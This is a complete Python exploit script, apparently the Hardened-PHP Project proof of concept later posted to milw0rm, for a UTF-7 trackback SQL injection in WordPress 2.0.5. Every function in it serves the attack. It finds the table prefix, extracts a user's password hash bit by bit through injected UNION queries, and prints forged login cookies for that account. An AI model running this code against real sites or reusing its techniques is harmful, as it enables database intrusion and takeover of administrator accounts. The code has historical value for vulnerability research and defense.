#!/usr/bin/python ####################################################################### # _ _ _ _ ___ _ _ ___ # | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ # | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ # |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| # ####################################################################### # Proof of concept code from the Hardened-PHP Project # # NOT FOR DISTRIBUTION # PLEASE DO NOT SPREAD THIS CODE # ####################################################################### # # -= Wordpress 2.0.5 =- # Trackback UTF-7 SQL injection exploit # # beware of encoded single-quotes # ####################################################################### import urllib import getopt import sys import string import re import time import datetime import md5 __argv__ = sys.argv def banner(): print "Wordpress 2.0.5 - Trackback UTF-7 SQL injection exploit" print "Copyright (C) 2006 Stefan Esser/Hardened-PHP Project" print " *** DO NOT DISTRIBUTE ***\n" def usage(): banner() print "Usage:\n" print " $ ./wordpressx.py [options]\n" print " -h http_url url of the Wordpress blog" print " f.e. http://www.wordpress.org/development/" print " -p id id of posting to exploit trackback (default: 1)" print " -i id User id to steal password hash for(default: -1)" print " -u username username to steal password hash for (default: ...)" print "" sys.exit(-1) def determineCookieHash(host): wclient = urllib.URLopener() print "[+] Connecting to retrieve cookie hash" try: req = wclient.open(host + "/wp-login.php?action=logout") except IOError, e: if e[1] == 302: # Got a 302 redirect, but check for cookies before redirecting. # e[3] is a httplib.HTTPMessage instance. if e[3].dict.has_key('set-cookie'): cookie = e[3].dict['set-cookie']; chash = cookie[string.find(cookie, "user_")+5:] chash = chash[:string.find(chash, "=")] print "[+] Cookie hash found: %s" % chash return chash print "[-] Unable to retrieve cookie... something is wrong" sys.exit(-3) return "" def determineIsMbstringInstalled(host, pid): wclient = urllib.URLopener() print "[+] Connecting to check if mbstring is installed" params = { 'charset' : 'UTF-7', 'title' : '+ADA-' } try: req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params)) except IOError, e: if e[1] == 302: print "[+] ext/mbstring is installed. continue with exploit" return 1 content = req.read() if string.find(content, 'error>1') != -1: print "[-] Illegal posting id choosen, test impossible" sys.exit(-2) print "[-] ext/mbstring not installed... exploit not possible" sys.exit(-2) return 0 def determineTablePrefix(host, pid): wclient = urllib.URLopener() print "[+] Connecting to determine mysql table prefix" params = { 'charset' : 'UTF-7', 'title' : 'None', 'url' : 'None', 'excerpt' : 'None', 'blog_name' : '+ACc-ILLEGAL' } try: req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params)) except IOError, e: if e[1] == 302: print "[-] Table prefix cannot be determined... exploit not possible" sys.exit(-2) return "" content = req.read() f = re.search('FROM (.*)comments WHERE', content) if f != None: prefix = f.group(1) print "[+] Table prefix is: %s" % prefix return prefix print "[-] Table prefix cannot be determined... exploit not possible" sys.exit(-2) return "" def lockTrackbacks(host, pid): now = datetime.datetime.utcnow() now = now.replace(microsecond = 0) future = now + datetime.timedelta(days=1) future = future.replace(microsecond = 0) wclient = urllib.URLopener() print "[+] Connecting to lock trackbacks" author = "Mark Mouse" author_email = "mark@incidents.org" author_url = "" author_ip = "" agent = "Internet Explorer" futuredate = future.isoformat(' ') futuredate_gmt = future.isoformat(' ') date = now.isoformat(' ') date_gmt = now.isoformat(' ') sql = "%s','%s','%s','%s','%s','%s','','0','%s','comment','0','0'),('0', '', '', '', '', '%s', '%s', '', 'spam', '', 'comment', '0','0' ) /*" % \ ( author , author_email , author_url , author_ip , date , date_gmt , agent, futuredate, futuredate_gmt ) sql = string.replace(sql, "'", "+ACc-") params = { 'charset' : 'UTF-7', 'title' : 'None', 'url' : 'None', 'excerpt' : 'None', 'blog_name' : sql } try: req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params)) except IOError, e: if e[1] == 302: print "[-] Table prefix cannot be determined... exploit not possible" sys.exit(-2) return "" content = req.read() return "" def checkUsername(host, pid, prefix, name, uid): wclient = urllib.URLopener() print "[+] Connecting to check if user %s is present" % name if uid != -1: sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE ID='%s' /*" % (prefix, uid) else: sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE user_login='%s' /*" % (prefix, name) sql = string.replace(sql, "'", "+ACc-") params = { 'charset' : 'UTF-7', 'title' : 'None', 'url' : 'None', 'excerpt' : 'None', 'blog_name' : sql } req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params)) content = req.read() if string.find(content, 'Duplicate') != -1: return 1 if string.find(content, 'Doppelter') != -1: return 1 if uid != -1: print "[-] Error user_id invalid" else: print "[-] Error username invalid" sys.exit(-2) return 0 def bruteforceBit(host, pid, prefix, name, uid, bit): wclient = urllib.URLopener() nibble = (bit / 4) + 1 bit = (bit % 4) + 1 sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE " % prefix if uid != -1: sql = sql + "ID='%s'" % uid else: sql = sql + "user_login='%s'" % name sql = sql + " and substring(reverse(lpad(conv(substring(user_pass, %d,1), 16, 2),4,'0')),%d,1)='1' /*" % (nibble, bit) sql = string.replace(sql, "'", "+ACc-") params = { 'charset' : 'UTF-7', 'title' : 'None', 'url' : 'None', 'excerpt' : 'None', 'blog_name' : sql } req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params)) content = req.read() if string.find(content, '15 seconds') != -1: return 0 if string.find(content, '15 Sekunden') != -1: return 0 if string.find(content, 'Duplicate') != -1: return 1 if string.find(content, 'Doppelter') != -1: return 1 print "[-] Error retrieving password hash: unexpected reply at bit %d" % bit sys.exit(-2) return "" def bruteforce(host, pid, prefix, name, uid): phash = "" print "[+] Retrieving the password hash bit by bit" for i in range(32): nibble = 0 print "%s" %i; for j in range(4): print "%s" %j; nibble = nibble | (bruteforceBit(host, pid, prefix, name, uid, i*4+j) << j) phash = phash + "%x" % nibble return phash def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:i:u:p:e:d:") except getopt.GetoptError: usage() if len(__argv__) < 2: usage() username = 'admin' password = None email = None domain = None host = None pid = 1 uid = -1 for o, arg in opts: if o == "-h": host = arg if o == "-p": pid = arg if o == "-i": uid = arg if o == "-u": username = arg if o == "-e": email = arg if o == "-d": domain = arg # Printout banner banner() # Check if everything we need is there if host == None: print "[-] need a host to connect to" sys.exit(-1) # if username == None: # print "[-] username needed to continue" # sys.exit(-1) # if password == None: # print "[-] password needed to continue" # sys.exit(-1) # if email == None: # print "[-] email address needed to continue" # sys.exit(-1) # if domain == None: # print "[-] catch all domain needed to continue" # sys.exit(-1) determineIsMbstringInstalled(host, pid) chash = determineCookieHash(host) lockTrackbacks(host, pid) prefix = determineTablePrefix(host, pid) checkUsername(host, pid, prefix, username, uid) phash = bruteforce(host, pid, prefix, username, uid) print "[+] Done..." print " The password hash is %s" % phash m = md5.new() m.update(phash) cphash = m.hexdigest() print " The logincookies are:" print " wordpressuser_%s=%s" % (chash, username) print " wordpresspass_%s=%s" % (chash, cphash) if __name__ == "__main__": main() # milw0rm.com [2007-01-07]